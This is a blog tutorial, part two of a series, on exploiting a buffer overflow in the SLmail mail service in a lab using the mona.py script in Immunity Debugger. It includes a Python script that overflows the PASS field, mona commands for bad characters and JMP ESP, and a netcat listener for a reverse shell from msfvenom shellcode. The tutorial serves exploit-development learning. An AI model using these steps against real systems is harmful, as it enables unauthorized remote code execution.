Buffer Overflow Attack ( Part - II)— Mona Script

image from unsplash

Hello Everyone !! , Hope you have read the first part of buffer overflow attack in which we have discussed in detail about, what is buffer , buffer overflow , buffer overflow attack,types of buffer overflow attack , impact of buffer overflow attack and we exploited SLmail service in which we face some difficulty in finding bad characters which is mitigate by the use of mona.py script . If you have not read the first part then this part is somewhat difficult to understand easily, so i suggest you to read the previous part and then come to the second part. Link to the first part —> First-Part

In this blog we are going to learn how to use mona.py script in buffer overflow attack to make it little bit easier.

  • Mona.py is a python script that can be used to automate and speed up the specific searches while developing exploits .
  • It runs on Immunity Debugger and WinDBG.
  • Although it runs in WinDBG x64 .
  • It requires python 2.7 to run .
  • The majority of its features were written specifically for 32bit processes.

Download & Setup :

  • Lab setup is given in first part.
  • Firstly install python 2.7 , without python script its unable to run.
  • We can easily download mona script from its github repository
  • Link to Download : https://github.com/corelan/mona
  • After downloading place the mona file at the given location

C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

  • We can run mona command in immunity debugger at the bottom side input box.
  • To insure that mona script is in proper working condition we have to open immunity debugger and run the following command .

!mona help

  • Above output shows that mona is successyfully downloaded and added into the immunity debugger.
  • Next step is to make a shared folder between the Attacker Pc and Target Pc
  • Suppose our target pc is in virtual box and attacker pc is our actual pc , then we have to make one shared folder between both the pc .
  • For making shared folder in virtual box we have to go in the menubar and select devices option , inside the devices option there are further more options are available, from there we have to choose Shared folder option and then select the shared folder setting. In the setting we have to add the shared folder by clicking on the right side green add symbol (remember that the permission of shared folder must be WRITABLE or 777).
  • In my case I set my shared folder : /opt/buffer-overflow/
  • Now mount the folder and restart your virtual pc.
  • We get shared folder .
  • Now we have to set Working Folder for mona ( in which it store its generated files )
  • Inside the mounted folder make a folder name mona ( you can give any name )
  • Check on attacker pc that mona folder is visible or not . If not visible then you have to give proper permission or check the setting of shared folder.
  • Set working folder by using the following command

!mona config -set workingfolder Z:\mona\%p

Z - Drive (mounted shared folder)

mona - Folder name ( which we want to set as working folder for mona )

%p - By using %p switch mona create the file inside the working folder with the name of the currently working service ( For eg :- Im working on SLmail service then mona automatically make SLmail folder inside its working folder)

  • Setting Working Folder is Successfully completed.
  • All the setup is done and mona script is now ready to use .

In this blog Im giving focus toward the mona script rather than other, that’s why i will skip some points . All the points are explain in detail in first part.

[*] Crashing the service

This step is same as given in part 1

[*] Verifying Offset (EIP) and ESP starting

This step is same as given in part 1

Offset value is 2606

[*] Finding bad characters

We allready know verywell what is bad character and why we need to find them.

In part 1 we used python script to generate bad character.

Now we find bad character using mona script.

  • Start the SLmail service and run the immunity debugger as admin
  • Attach the SLmail in immunity debugger .
  • Now set working folder as we discussed above

!mona config -set workingfolder Z:\mona\%p

  • Generate bytearray for finding bad character , command to generate bytearray

!mona bytearray

  • Bytearray is generated successfully and save at the location opf working folder.
  • Now we have to make Python Script to find bad character using bytearray file
#!/usr/bin/pythonimport sys,socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = “A” * 2606
buffer += “BBBB”
buffer += “\x90” * 20
buffer += open(“bytearray.bin”,”rb”).read()
buffer += “C” * (4000 — len(buffer))
sock.send(‘USER username’ + ‘\r\n’)
sock.send(‘PASS ‘ + buffer + ‘\r\n’)
  • Now run the immunity debugger and run this script simultaneously
  • Service crashed.
  • ESP value is 018BA128
  • Now run the following command to find bad character

!mona compare -f z:\mona\SLmail\bytearray.bin -a 018BA128

  • When we run this command popup window come and shows the badcharacters. Here is show bad character is ‘\x00’
  • Now we have to again generate bytearray with excluding \x00 for that we have command

!mona bytearray -cpb ‘\x00’

  • Again compare it and find bad character and this process is continue till we get empty bad character section pr unmodified status.
  • In this way we can use mona script.

[*] Find Return Address ( JMP ESP )

For finding JMP ESP we have following command

!mona jmp -r esp

Pickup anyone module and note their address.

[*] Generate shellcode and Script

We have all the value esp address , bad characters , offset values Now generate the shellcode using msfvenome.

Placed the shell code into the script with 32 nop.

  • Our script is complete now .
  • Start the listner on attacker pc at port 4455

nc -nlvp 4455

[*] Get Reverse Connection

  • Restart SLmail service
  • Restart immunity debugger
  • Attach the process of SLmail
  • Run the Service And run our script
  • Boom we get reverse connection of the pc

References & Resource:

Thank You for reading this blog.

If you have any Doubt regarding this then feel free to contact with me

You can follow me on linkedin and twitter

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store